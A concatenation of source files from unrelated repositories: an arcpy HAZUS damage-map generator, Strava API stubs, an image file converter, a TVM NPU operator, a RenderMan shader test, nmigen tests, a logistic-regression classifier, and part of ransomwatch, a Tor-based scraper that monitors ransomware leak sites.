with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = complete
urows.updateRow(urow)
self.update_fc(fc, 'PDsCompleteBC')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\SearchandRescueNeeds.mxd"
map_name = "SearchandRescueNeeds"
self.update_and_export_map(mxd, map_name)
def shelter_needs(self, cursor):
"""This function creates a shelter needs map by querying the
eqTract table in the SQL Server database."""
self.logger.info("You want to make a shelter needs map!")
# Get the data from SQL Server
shelter_sql = """
SELECT Tract, ShortTermShelter, DisplacedHouseholds, ExposedPeople, ExposedValue
FROM eqTract
"""
cursor.execute(shelter_sql)
shelter_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for shelter_tract in shelter_tracts:
tract = shelter_tract.Tract
displaced = shelter_tract.DisplacedHouseholds
shelter = shelter_tract.ShortTermShelter
exposed_people = shelter_tract.ExposedPeople
exposed_value = shelter_tract.ExposedValue
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['DisplacedHouseholds', 'ShortTermShelter', 'ExposedPeople', 'ExposedValue']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = displaced
urow[1] = shelter
urow[2] = exposed_people
urow[3] = exposed_value
urows.updateRow(urow)
self.update_fc(fc, 'DisplacedHouseholds')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\ShelterNeeds.mxd"
map_name = "ShelterNeeds"
self.update_and_export_map(mxd, map_name)
def utility_damage(self, cursor):
"""THis function creates a utility damage map by querying the
eqElectricPowerFlty, eqOilFlty and eqNaturalGasFlty tables in the
SQL Server database."""
self.logger.info("You want to make a utility damage map!")
# Get the datat from SQL Server
electric_flty_sql = """
SELECT ElectricPowerFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqElectricPowerFlty
"""
cursor.execute(electric_flty_sql)
electric_facilities = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqElectricPowerFlty table
electric_fc = self.study_region_data + "\\eqElectricPowerFlty"
for electric_facility in electric_facilities:
electric_flty_id = electric_facility.ElectricPowerFltyID
electric_flty_moderate = electric_facility.PDsExceedModerate
electric_flty_funct_day1 = electric_facility.FunctDay1
electric_flty_econ_loss = electric_facility.EconLoss
query = '[ElectricPowerFltyID] = ' + '\'' + electric_flty_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(electric_fc, fields, query) as urows:
for urow in urows:
urow[0] = electric_flty_moderate
urow[1] = electric_flty_moderate
urow[2] = electric_flty_econ_loss
urows.updateRow(urow)
self.update_fc(electric_fc, 'PDsExceedModerate')
# Get the datat from SQL Server
natural_gas_flty_sql = """
SELECT NaturalGasFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqNaturalGasFlty
"""
cursor.execute(natural_gas_flty_sql)
natural_gas_facilities = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqNaturalGasFlty table
ng_fc = self.study_region_data + "\\eqNaturalGasFlty"
for natural_gas_facility in natural_gas_facilities:
natural_gas_flty_id = natural_gas_facility.NaturalGasFltyID
natural_gas_flty_moderate = natural_gas_facility.PDsExceedModerate
natural_gas_flty_funct_day1 = natural_gas_facility.FunctDay1
natural_gas_flty_econ_loss = natural_gas_facility.EconLoss
query = '[NaturalGasFltyID] = ' + '\'' + natural_gas_flty_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(ng_fc, fields, query) as urows:
for urow in urows:
urow[0] = natural_gas_flty_moderate
urow[1] = natural_gas_flty_moderate
urow[2] = natural_gas_flty_econ_loss
urows.updateRow(urow)
self.update_fc(ng_fc, 'PDsExceedModerate')
# Get the datat from SQL Server
oil_flty_sql = """
SELECT OilFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqOilFlty
"""
cursor.execute(oil_flty_sql)
oil_facilities = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqOilFlty table
oil_fc = self.study_region_data + "\\eqOilFlty"
for oil_facility in oil_facilities:
oil_flty_id = oil_facility.OilFltyID
oil_flty_moderate = oil_facility.PDsExceedModerate
oil_flty_funct_day1 = oil_facility.FunctDay1
oil_flty_econ_loss = oil_facility.EconLoss
query = '[OilFltyID] = ' + '\'' + oil_flty_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(oil_fc, fields, query) as urows:
for urow in urows:
urow[0] = oil_flty_moderate
urow[1] = oil_flty_moderate
urow[2] = oil_flty_econ_loss
urows.updateRow(urow)
self.update_fc(oil_fc, 'PDsExceedModerate')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\UtilityDamage.mxd"
map_name = "UtilityDamage"
self.update_and_export_map(mxd, map_name)
def water_infrastructure_damage(self, cursor):
"""This function creates a potable water infrastructure damage map by
querying the eqPotableWaterDL table in the SQL Server database."""
self.logger.info("You want to make a water Infrastructure damage map!")
# Get the data from SQL Server
water_sql = """
SELECT Tract, TotalPipe, TotalNumRepairs, TotalDysRepairs, EconLoss, Cost
FROM eqPotableWaterDL
"""
cursor.execute(water_sql)
water_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqPotableWaterDL table
fc = self.study_region_data + "\\eqPotableWaterDL"
for water_tract in water_tracts:
tract = water_tract.Tract
total_pipe = water_tract.TotalPipe
total_repairs = water_tract.TotalNumRepairs
total_days = water_tract.TotalDysRepairs
econ_loss = water_tract.EconLoss
cost = water_tract.Cost
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['TotalPipe', 'TotalNumRepairs', 'TotalDysRepairs', 'EconLoss', 'Cost']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = total_pipe
urow[1] = total_repairs
urow[2] = total_days
urow[3] = econ_loss
urow[4] = cost
urows.updateRow(urow)
self.update_fc(fc, 'EconLoss')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\WaterInfrastructureDamage.mxd"
map_name = "WaterInfrastructureDamage"
self.update_and_export_map(mxd, map_name)
def update_fc(self, fc, field):
"""This function updates a feature class that removes all of the records
from the geodatabase that are not part of the study region. The fc
parameter is the feature class to update and the field parameter is the
field in the feature class that was updated with data from the HAZUS
database. Records not part of the study region will have a field value
of NULL."""
query = '[' + field + '] IS NULL'
with da.UpdateCursor(fc, '*', query) as urows:
for urow in urows:
urows.deleteRow()
# 6.d Update the template mxds with a new extent
# Map symbology should be set from the template lyr files
def update_and_export_map(self, mxd, map_name):
"""This function takes a path to an mxd on disk and a map name as input.
Using the arcpy module, it then sets the extent of the data frame to
match all of the Census Tracts in the study region. The map elements
are updated to match the author name and reflect any tabular information
contained on the map layout."""
current_map = mapping.MapDocument(mxd)
df = mapping.ListDataFrames(current_map, "Template_Data")[0]
# Set the map extent to match the one calculated in the determine_map_extent
# function. Per the ArcGIS documentation, copy the existing data frame
# extent before modifying it.
new_extent = df.extent
new_extent.XMin = self.map_extent["XMin"]
new_extent.XMax = self.map_extent["XMax"]
new_extent.YMin = self.map_extent["YMin"]
new_extent.YMax = self.map_extent["YMax"]
df.extent = new_extent
current_map.save()
self.sb.SetStatusText("Updated: " + mxd)
# 6.e Export maps as PDF and JPEG
pdf_out_dir = self.scenario_dir + "\\PDF"
jpeg_out_dir = self.scenario_dir + "\\JPEG"
mapping.ExportToPDF(current_map, pdf_out_dir + "\\" + map_name + ".pdf")
mapping.ExportToJPEG(current_map, jpeg_out_dir + "\\" + map_name + ".jpeg", resolution=200)
self.sb.SetStatusText("Exported: " + map_name)
# 7. View log files if desired
def __initlogging(self):
"""Initialize a log file to view all of the settings and error information each time
the script runs."""
self.logger = logging.getLogger("HAZUSMapCreatorLog")
self.logger.setLevel(logging.DEBUG)
# Create a file handler
ch = logging.FileHandler(self.logfile)
ch.setLevel(logging.DEBUG)
# Format the logfile entries
formatter = logging.Formatter("[%(asctime)s][%(name)s:%(lineno)d][%(levelname)s] %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
self.logger.addHandler(ch)
try:
app = wx.App()
frame = MainFrame(None)
frame.Show()
app.MainLoop()
except:
# Error handling code from ArcGIS Resource Center
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
pymsg = "PYTHON ERRORS:\nTraceback Info:\n" + tbinfo + "\nError Info:\n " + str(sys.exc_type) + ": " + str(
sys.exc_value) + "\n"
print pymsg
``` |
{
"source": "JoshGuarino/stravapy",
"score": 2
} |
#### File: stravapy/resources/routes.py
```python
from request import Request
class Routes(object):
def get_route_as_gpx():
return
def ger_route_as_tcx():
return
def get_route_by_id():
return
def get_routes_by_athlete_id():
return
```
#### File: stravapy/resources/segments.py
```python
from request import Request
class Segments(object):
def explore_segments():
return
def get_logged_in_athlete_starred_segments():
return
def get_segment_by_id():
return
def star_segment():
return
```
#### File: stravapy/resources/uploads.py
```python
from request import Request
class Uploads(object):
def create_upload():
return
def get_upload_by_id():
return
```
#### File: stravapy/stravapy/stravapy.py
```python
from resources import *
from request import Request
from oauth import Oauth
class Stravapy:
def __init__(self, access_token):
self.access_token = access_token
self.base_url = 'https://www.strava.com/api/v3'
self.headers = { 'Authorization' : f'Bearer: {access_token}' }
self.activities = activities.Activities
self.athlete = athlete.Athlete
self.clubs = clubs.Clubs
self.gear = gear.Gear
self.routes = routes.Routes
self.running_races = running_races.RunningRaces
self.segment_efforts = segment_efforts.SegmentEfforts
self.segments = segments.Segments
self.streams = streams.Streams
self.uploads = uploads.Uploads
``` |
{
"source": "joshgyn/FileConverter",
"score": 3
} |
#### File: joshgyn/FileConverter/main.py
```python
from wand.image import Image as wi
import os.path
from os import path
import argparse
def get_arguments(): # gets arguments and files from user
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", dest="file", help="File to be converted, (e.g. sample.pdf, apple.png, baseball.jpg).")
parser.add_argument("-ct" , "--convert_type", dest="convert_type", help="New file type to be converted to, (e.g. png or jpg).")
(options) = parser.parse_args()
if not options.file:
parser.error("[-] Please specify a file, use --help for more info.")
elif not options.convert_type:
parser.error("[-] Please specify a file type to be converted to, use --help for more info.")
return options
def check_file(options): # checks if file, and file type to be converted exsits
try:
print(f"[+] Checking if {options.file} exsits.")
if path.exists(options.file) == True:
print(f"[+] File {options.file} found.")
file_name = options.file[:-4]
try:
extension_list = {"pdf": "pdf", "png": "png", "jpg": "jpeg", "gif": "gif", "tif": "tif", "bmp": "bmp", "eps": "eps"}
file_extension = extension_list[options.convert_type]
return file_name, file_extension
except KeyError:
print(f"[-] File type {options.convert_type} to be converted to was not found. Please check the extension before trying again, (e.g. png or jpg).")
else:
print(f"[-] File {options.file} not found. Please check the name and extension before trying again. (e.g. sample.pdf).")
exit()
except Exception as msg:
report_issue(msg)
def convert_file(options, file_name, file_extension): # converts files to other formats
try:
print(f"[+] Converting {options.file} to {file_name}.{options.convert_type}")
pdf = wi(filename=options.file, resolution=300)
pdfimage = pdf.convert(file_extension)
i=1
for img in pdfimage.sequence:
page = wi(image=img)
page.save(filename=f"{file_name}{str(i)}.{options.convert_type}")
i +=1
print("[+] File was successfully converted.")
except Exception as msg:
exception_ghostscript = 'FailedToExecuteCommand `"gswin64c.exe"'
exception_ghostscript_compare = str(msg)
if exception_ghostscript == exception_ghostscript_compare[:38]:
print("[-] File was not successfully converted.\n")
print("There is an issue with ghostscript. Reinstall or download latest version and try again.")
print("Visit: https://github.com/PeanutTheAdmin/FileConverter for install instructions.\n")
else:
print("[-] File was not successfully converted.")
report_issue(msg)
def report_issue(msg):
print(f"[BUG] {msg}\n")
print("To report this issue go to: https://github.com/PeanutTheAdmin/FileConverter/issues")
print("When reporting this issue include the output after [BUG]\n")
def main(): # Main Function
options = get_arguments()
file_name, file_extension = check_file(options)
convert_file(options, file_name, file_extension)
if __name__ == "__main__":
main()
``` |
{
"source": "josh-hadley/dough-doh",
"score": 4
} |
#### File: josh-hadley/dough-doh/dough-doh.py
```python
import argparse
from collections import namedtuple
Ingredient = namedtuple("Ingredient", ["name", "amount", "units"])
MASTER_RECIPE = [
Ingredient("Water", 101.66, "g"),
Ingredient("Fresh Yeast", 0.5, "g"),
Ingredient("Dry Yeast", 0.2, "g"),
Ingredient("Olive Oil", 3.33, "ml"),
Ingredient("00 Flour", 166.66, "g"),
Ingredient("Sea Salt", 4, "g"),
]
def scale_recipe(multiplier: int, fresh: bool=False):
if fresh:
base = filter(lambda x: x.name != "Dry Yeast", MASTER_RECIPE)
else:
base = filter(lambda x: x.name != "Fresh Yeast", MASTER_RECIPE)
scaled = [
Ingredient(x.name, round(x.amount * multiplier, 2), x.units)
for x in base]
return scaled
def format_recipe(recipe, multiplier: int) -> str:
t = f"INGREDIENTS FOR {multiplier} DOUGH BALL{'S' if multiplier != 1 else ''}\n"
t += "-" * (len(t) - 1) + "\n"
s = "\n".join(
[f"{x.name:<8}\t{x.amount:>7,.1f} {x.units:<3}" for x in recipe])
return t + s + "\n"
def main():
parser = argparse.ArgumentParser()
parser.add_argument("multiplier", type=int, default=1)
parser.add_argument("-f", "--fresh-yeast", action="store_true")
args = parser.parse_args()
scaled = scale_recipe(args.multiplier, args.fresh_yeast)
print(format_recipe(scaled, args.multiplier))
if __name__ == '__main__':
main()
``` |
{
"source": "joshhamlin/Morse-code",
"score": 4
} |
#### File: joshhamlin/Morse-code/morse.py
```python
def toMorse(Main):
MorseFinAry = []
Tarry = list(Main)
for char in Tarry:
if char.lower() == "a":
MorseFinAry.append(".- ")
elif char.lower() == "b":
MorseFinAry.append("-... ")
elif char.lower() == "c":
MorseFinAry.append("-.-. ")
elif char.lower() == 'd':
MorseFinAry.append("-.. ")
elif char.lower() == 'e':
MorseFinAry.append(". ")
elif char.lower() == 'f':
MorseFinAry.append("..-. ")
elif char.lower() == 'g':
MorseFinAry.append("--. ")
elif char.lower() == 'h':
MorseFinAry.append(".... ")
elif char.lower() == 'i':
MorseFinAry.append(".. ")
elif char.lower() == 'j':
MorseFinAry.append(".--- ")
elif char.lower() == 'k':
MorseFinAry.append("-.- ")
elif char.lower() == 'l':
MorseFinAry.append(".-.. ")
elif char.lower() == 'm':
MorseFinAry.append("-- ")
elif char.lower() == 'n':
MorseFinAry.append("-. ")
elif char.lower() == 'o':
MorseFinAry.append("--- ")
elif char.lower() == 'p':
MorseFinAry.append(".--. ")
elif char.lower() == 'q':
MorseFinAry.append("--.- ")
elif char.lower() == 'r':
MorseFinAry.append(".-. ")
elif char.lower() == 's':
MorseFinAry.append("... ")
elif char.lower() == 't':
MorseFinAry.append("- ")
elif char.lower() == 'u':
MorseFinAry.append("..- ")
elif char.lower() == 'v':
MorseFinAry.append("...- ")
elif char.lower() == 'w':
MorseFinAry.append(".-- ")
elif char.lower() == 'x':
MorseFinAry.append("-..- ")
elif char.lower() == 'y': #and z
MorseFinAry.append("-.-- ")
elif char.lower() == 'z':
MorseFinAry.append("--.. ")
elif char == "1":
MorseFinAry.append(".---- ")
elif char == "2":
MorseFinAry.append("..--- ")
elif char == "3":
MorseFinAry.append("...-- ")
elif char == '4':
MorseFinAry.append("....- ")
elif char == '5':
MorseFinAry.append("..... ")
elif char == '6':
MorseFinAry.append("-.... ")
elif char == '7':
MorseFinAry.append("--... ")
elif char == '8':
MorseFinAry.append("---.. ")
elif char == '9':
MorseFinAry.append("----. ")
elif char == '0':
MorseFinAry.append("----- ")
elif char == '.':
MorseFinAry.append(".-.-.- ")
elif char == ',':
MorseFinAry.append("--..-- ")
elif char == "?":
MorseFinAry.append("..--..")
elif char == '/':
MorseFinAry.append("-..-.")
elif char == '@':
MorseFinAry.append(".--.-. ")
elif char == " ":
MorseFinAry.append("| ")
else:
print("char not valid")
return MorseFinAry
while True:
print("Type [help] if you are unsure how to use this\n")
InMain = input("Type a string or morse code -->")
if InMain == "[help]":
print("When typing in strings just type as you normally would\n")
print("Case will not effect the out put because mores code does not account for case\n")
print("example --> Type a string or morse code -->I would like to read this in morse code \n")
print("you can use the following in your sting |a - z|, |0 - 9|, '.', ',', '?', '/' and '@' ")
#works good converting to morse code
Pans = toMorse(InMain)
print(''.join(Pans))
#works we just need to hadel funny in put and tuch of UI
``` |
{
"source": "joshhead/gcn-bluetooth",
"score": 2
} |
#### File: gcn-bluetooth/joybusutils/test_tinymodule.py
```python
from nmigen import Module
from nmigen.sim.pysim import Simulator, Tick
from tinymodule import TinyModule
from nmigen.test.utils import FHDLTestCase
import unittest
CLOCK_PERIOD = 1/12_000_000
class TinyModuleTest(FHDLTestCase):
def setUp(self):
self.tinymodule = TinyModule()
self.sim = Simulator(self.tinymodule)
self.sim.add_clock(CLOCK_PERIOD)
def test_output_starts_at_0(self):
def process():
self.assertEqual((yield self.tinymodule.output), 0)
self.sim.add_sync_process(process)
self.sim.run()
def test_output_toggles_after5_ticks(self):
def process():
for _ in range(4):
yield Tick()
self.assertEqual((yield self.tinymodule.output), 0)
for _ in range(32):
yield Tick()
self.assertEqual((yield self.tinymodule.output), 1)
self.sim.add_sync_process(process)
self.sim.run()
if __name__ == "__main__":
unittest.main()
```
#### File: gcn-bluetooth/joybusutils/tinymodule.py
```python
from nmigen import Elaboratable, Signal, Module
from nmigen.sim.pysim import Simulator, Tick
from tabulate import tabulate
class TinyModule(Elaboratable):
def __init__(self):
self.counter = Signal(5)
self.output = Signal()
def ports(self):
return [self.output]
def elaborate(self, platform):
m = Module()
m.d.sync += self.counter.eq(self.counter + 1)
# Once high, output should stay high.
with m.If(self.output == 1):
m.d.comb += self.output.eq(1)
# Otherwise, wait for 5 clock ticks
with m.Elif(self.counter == 5):
m.d.comb += self.output.eq(1)
return m
if __name__ == "__main__":
tinymodule = TinyModule()
sim = Simulator(tinymodule)
sim_results = []
def process():
# Enough ticks for the counter to overflow
for i in range(35):
sim_results.append([i, (yield tinymodule.counter), (yield tinymodule.output)])
yield Tick()
sim.add_sync_process(process)
# 12mhz clock
sim.add_clock(1/12_000_000)
with sim.write_vcd("tinymodule_sim.vcd", "tinymodule_sim.gtkw", traces=tinymodule.ports()):
sim.run()
print(tabulate(sim_results, headers=["Clock", "Counter", "Output"]))
``` |
{
"source": "Josh-Hegewald/uci-statnlp",
"score": 4
} |
#### File: uci-statnlp/hw1/classify.py
```python
def train_classifier(X, y):
"""Train a classifier using the given training data.
Trains a logistic regression on the input data with default parameters.
"""
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
cls = LogisticRegression()
param_grid = {
'C': [100],
'penalty': ['l2'],
'max_iter': list(range(400, 600, 200)),
'solver': ['lbfgs']
}
param_search = GridSearchCV(cls, param_grid=param_grid, refit=True, verbose=3, cv=3)
param_search.fit(X, y)
print("printing grid scores")
print(param_search.cv_results_)
import matplotlib.pyplot as plt
print(param_grid['C'])
print(param_search.cv_results_['mean_test_score'])
plt.plot(param_grid['C'], param_search.cv_results_['mean_test_score'])
import seaborn as sns
return param_search
def evaluate(X, yt, cls):
"""Evaluated a classifier on the given labeled data using accuracy."""
from sklearn import metrics
yp = cls.predict(X)
acc = metrics.accuracy_score(yt, yp)
print(" Accuracy", acc)
``` |
{
"source": "joshherr-quic/tvm",
"score": 2
} |
#### File: ethosu/te/identity.py
```python
from tvm import te
from .dma import read_compute, write_compute
def identity_compute(
ifm: te.Tensor,
lut: te.Tensor,
ifm_scale: float,
ifm_zero_point: int,
ofm_scale: float,
ofm_zero_point: int,
activation: str,
) -> te.Tensor:
"""A compute operator for the NPU identity operator.
Parameters
----------
ifm : te.Tensor
The Input Feature Map tensor (IFM).
lut : te.Tensor
The look-up table values to use if activation is "LUT", "TANH" or "SIGMOID".
ifm_scale : float
The quantization scale for the Input Feature Map tensor.
ifm_zero_point : int
The quantization zero point for the Input Feature Map tensor.
ofm_scale : float
The quantization scale for the Output Feature Map tensor.
ofm_zero_point : int
The quantization zero point for the Output Feature Map tensor.
activation : str
The activation function to use.
"NONE" - no activation function.
"TANH" - tanh activation function.
"SIGMOID" - sigmoid activation function.
"LUT" - use a look-up table to perform the activation function.
Returns
-------
te.Tensor
The Output Feature Map tensor.
"""
dmaed_ifm = read_compute(ifm, ifm_zero_point, ifm_scale)
id_attrs = {"op": "ethosu_identity", "activation": activation}
# This is a trick to insert the LUT tensor into the TE graph if LUT is present
lut_expr = (lut[0] + lut[255]).astype(ifm.dtype) if activation in ("TANH", "LUT") else 0
# Add the LUT tensor to the attributes to be able to later tell which tensor is the LUT
if activation in ("TANH", "LUT"):
id_attrs["lut"] = lut
identity = te.compute(
ifm.shape,
lambda *i: (dmaed_ifm(*i) + lut_expr).astype(ifm.dtype),
name="ethosu_identity",
attrs=id_attrs,
)
dmaed_ofm = write_compute(identity, ofm_zero_point, ofm_scale)
return dmaed_ofm
``` |
{
"source": "JoshhhBailey/rman-toiletroll",
"score": 2
} |
#### File: JoshhhBailey/rman-toiletroll/shaderTesting.py
```python
import prman
import sys
import sys,os.path,subprocess
def CreateCube(width = 1.0, height = 1.0, depth = 1.0):
# The following function is from:
# <NAME>,. 2020. Introduction to Renderman and Python. [online]
# Available from: https://nccastaff.bournemouth.ac.uk/jmacey/msc/renderman/lectures/Lecture1/
# Accessed [23 March 2021]
w = width / 2.0
h = height / 2.0
d = depth / 2.0
# Rear
face = [-w, -h, d, -w, h, d, w, -h, d, w, h, d]
ri.Patch("bilinear", {'P':face})
# Front
face = [-w, -h, -d, -w, h, -d, w, -h, -d, w, h, -d]
ri.Patch("bilinear", {'P':face})
# Left
face = [-w, -h, -d, -w, h, -d, -w, -h, d, -w, h, d]
ri.Patch("bilinear", {'P':face})
# Right
face = [w, -h, -d, w, h, -d, w, -h, d, w, h, d]
ri.Patch("bilinear", {'P':face})
# Bottom
face = [w, -h, d, w, -h, -d, -w, -h, d, -w, -h, -d]
ri.Patch("bilinear", {'P':face})
# Top
face = [w, h, d, w, h, -d, -w, h, d, -w, h, -d]
ri.Patch("bilinear", {'P':face})
def CompileShader(shader):
# The following function is from:
# <NAME>., 2018. Lecture4Shaders. [online]
# Available from: https://github.com/NCCA/Renderman/blob/master/Lecture4Shaders/Bands/bands.py
# Accessed [25 March 2021]
if os.path.isfile(shader + ".oso") != True or os.stat(shader + ".osl").st_mtime - os.stat(shader + ".oso").st_mtime > 0:
print("compiling shader %s" %(shader))
try:
subprocess.check_call(["oslc", shader + ".osl"])
except subprocess.CalledProcessError:
sys.exit("shader compilation failed")
if __name__ == "__main__":
CompileShader("shaders/testShader")
ri = prman.Ri() # Create RenderMan interface instance
ri.Begin("__render") # Begin .rib and pass to renderer
ri.Display("toiletroll.exr", "framebuffer", "rgba") # File, Buffer, Colour Channels
ri.Format(512, 512, 1) # Width, Height, Aspect Ratio
# Camera coordinate system
ri.Projection(ri.PERSPECTIVE)
ri.Translate(0, 0, 2)
# World coordinate system
ri.WorldBegin()
# Create surface
ri.TransformBegin()
ri.AttributeBegin()
ri.Attribute ("identifier", {"name": "Surface"})
ri.Attribute('displacementbound',
{
'sphere' : [1],
'coordinatesystem' : ['object']
})
ri.Pattern('testShader','testShader',
{
})
ri.Bxdf("PxrSurface", "roll",
{
"reference color diffuseColor" : ["testShader:resultRGB"],
})
cube_width = 5
cube_height = 5
cube_depth = 0.5
CreateCube(cube_width, cube_height, cube_depth)
ri.AttributeEnd()
ri.TransformEnd()
ri.WorldEnd()
ri.End() # End .rib
``` |
{
"source": "joshhighet/ransomwatch",
"score": 3
} |
#### File: joshhighet/ransomwatch/geckodrive.py
```python
import time
import requests
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import WebDriverException
from sharedutils import checktcp
from sharedutils import randomagent
from sharedutils import sockshost, socksport
from sharedutils import stdlog, dbglog, errlog, honk
requests.packages.urllib3.disable_warnings()
def main(webpage):
'''
main function to fetch webpages with javascript rendering supporting onion routing
'''
stdlog('geckodriver: ' + 'starting to fetch ' + webpage)
dbglog('geckodriver: ' + 'configuring options, user agent & cert preacceptance')
options = Options()
options.headless = True
options.set_preference('dom.max_script_run_time', 15)
options.add_argument("start-maximized")
options.accept_untrusted_certs = True
options.set_preference('network.http.timeout', 20000)
options.set_preference("general.useragent.override", randomagent())
if '.onion' in webpage:
stdlog('geckodriver: ' + 'appears we are dealing with an onionsite')
if not checktcp(sockshost, socksport):
honk('geckodriver: ' + 'socks proxy not available and required for onionsites!')
else:
stdlog(
'geckodriver: ' + 'assumed torsocks proxy found - tcp://' \
+ sockshost + ':' + str(socksport)
)
stdlog('geckodriver: ' + 'configuring proxy settings')
options.set_preference('network.proxy.type', 1)
options.set_preference('network.proxy.socks', sockshost)
options.set_preference('network.proxy.socks_port', int(socksport))
options.set_preference("network.proxy.socks_remote_dns", True)
try:
stdlog('geckodriver: ' + 'starting webdriver')
driver = webdriver.Firefox(options=options)
stdlog('geckodriver: ' + 'fetching webpage')
driver.get(webpage)
# set the number of seconds to wait before working with the DOM
sleeptz = 5
stdlog('geckodriver: ' + 'waiting ' + str(sleeptz) + ' seconds to render elements')
time.sleep(sleeptz)
#if 'lockbitapt' in webpage:
# stdlog('geckodriver: ' + 'special detected, waiting for captcha')
# driver.add_cookie({"name": "ddosproteck", "value": "lol"})
# driver.find_element_by_css_selector('button').click()
'''
get html from dom after js processing and page rendering complete
'''
source = driver.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
stdlog('geckodriver: ' + 'fetched')
except WebDriverException as e:
# if e contains neterror?e=dnsNotFound, then we are dealing with an onion site failing hsdir
if 'about:neterror?e=dnsNotFound' in str(e):
errlog('geckodriver: ' + 'socks request unable to route to host, check hsdir resolution status!')
elif 'about:neterror?e=netTimeout' in str(e):
errlog('geckodriver: ' + 'geckodriver socks request timed out!')
else:
errlog('geckodriver: ' + 'error: ' + str(e))
driver.quit()
stdlog('geckodriver: ' + 'webdriver quit')
return None
if driver:
driver.quit()
stdlog('geckodriver: ' + 'webdriver quit')
return source
```
#### File: joshhighet/ransomwatch/markdown.py
```python
import os
import time
from datetime import datetime as dt
from sharedutils import gcount
from sharedutils import openjson
from sharedutils import postcount
from sharedutils import hostcount
from sharedutils import groupcount
from sharedutils import postssince
from sharedutils import parsercount
from sharedutils import onlinecount
from sharedutils import postslast24h
from sharedutils import version2count
from sharedutils import poststhisyear
from sharedutils import currentmonthstr
from sharedutils import mounthlypostcount
#from sharedutils import headlesscount
#from sharedutils import countcaptchahosts
from sharedutils import stdlog, dbglog, errlog, honk
from plotting import trend_posts_per_day, plot_posts_by_group, pie_posts_by_group
def suffix(d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
def custom_strftime(fmt, t):
return t.strftime(fmt).replace('{S}', str(t.day) + suffix(t.day))
friendly_tz = custom_strftime('%B {S}, %Y', dt.now()).lower()
def writeline(file, line):
'''write line to file'''
with open(file, 'a') as f:
f.write(line + '\n')
f.close()
def groupreport():
'''
create a list with number of posts per unique group
'''
stdlog('generating group report')
posts = openjson('posts.json')
# count the number of posts by group_name within posts.json
group_counts = gcount(posts)
# sort the group_counts - descending
sorted_group_counts = sorted(group_counts.items(), key=lambda x: x[1], reverse=True)
stdlog('group report generated with %d groups' % len(sorted_group_counts))
return sorted_group_counts
def mainpage():
'''
main markdown report generator - used with github pages
'''
stdlog('generating main page')
uptime_sheet = 'docs/README.md'
with open(uptime_sheet, 'w') as f:
f.close()
writeline(uptime_sheet, '')
writeline(uptime_sheet, '## summary')
writeline(uptime_sheet, '_' + friendly_tz + '_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, 'currently tracking `' + str(groupcount()) + '` groups across `' + str(hostcount()) + '` relays & mirrors - _`' + str(onlinecount()) + '` currently online_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '⏲ there have been `' + str(postslast24h()) + '` posts within the `last 24 hours`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🦈 there have been `' + str(mounthlypostcount()) + '` posts within the `month of ' + currentmonthstr() + '`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🪐 there have been `' + str(postssince(90)) + '` posts within the `last 90 days`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🏚 there have been `' + str(poststhisyear()) + '` posts within the `year of ' + str(dt.now().year) + '`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🦕 there have been `' + str(postcount()) + '` posts `since the dawn of ransomwatch`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, 'there are `' + str(parsercount()) + '` custom parsers indexing posts')
#writeline(uptime_sheet, 'there are `' + str(parsercount()) + '` active parsers, `' + str(headlesscount()) + '` of which using headless browsers - _`' + str(countcaptchahosts()) + '` groups have recently introduced captchas_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '_`' + str(version2count()) + '` sites using v2 onion services are no longer indexed - [support.torproject.org](https://support.torproject.org/onionservices/v2-deprecation/)_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '> see the project [README](https://github.com/thetanz/ransomwatch#ransomwatch--) for backend technicals')
def indexpage():
index_sheet = 'docs/INDEX.md'
with open(index_sheet, 'w') as f:
f.close()
groups = openjson('groups.json')
writeline(index_sheet, '# 📚 index')
writeline(index_sheet, '')
header = '| group | title | status | last seen | location |'
writeline(index_sheet, header)
writeline(index_sheet, '|---|---|---|---|---|')
for group in groups:
stdlog('generating group report for ' + group['name'])
for host in group['locations']:
stdlog('generating host report for ' + host['fqdn'])
if host['available'] is True:
#statusemoji = '⬆️ 🟢'
statusemoji = '🟢'
lastseen = ''
elif host['available'] is False:
# iso timestamp converted to yyyy/mm/dd
lastseen = host['lastscrape'].split(' ')[0]
#statusemoji = '⬇️ 🔴'
statusemoji = '🔴'
if host['title'] is not None:
title = host['title'].replace('|', '-')
else:
title = ''
